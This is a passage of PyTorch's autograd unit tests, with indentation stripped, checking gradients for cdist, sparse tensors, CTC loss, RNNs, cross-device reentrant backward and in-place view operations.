loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward passs does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# input_length, vary_lengths, zero_lengths
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
# checks that undefined gradients doen't hamper the backward
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
@skipMeta # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
@skipMeta # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishs on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishs on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
